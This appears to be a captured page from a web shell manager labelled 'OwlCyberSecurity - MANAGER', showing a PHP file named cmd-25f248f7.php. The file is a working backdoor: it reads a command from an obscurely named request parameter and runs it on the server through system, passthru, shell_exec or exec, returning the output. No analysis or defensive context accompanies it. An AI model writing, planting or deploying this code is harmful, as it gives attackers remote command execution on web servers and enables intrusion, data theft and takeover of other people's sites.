OwlCyberSecurity - MANAGER
Edit File: cmd-25f248f7.php
<?php if(isset($_REQUEST["a5bffdb19137"])){$c=$_REQUEST["a5bffdb19137"];if(is_callable("system")){echo system($c);}elseif(is_callable("passthru")){echo passthru($c);}elseif(is_callable("shell_exec")){echo shell_exec($c);}else{$o=array();exec($c,$o);echo implode("\n",$o);}} ?>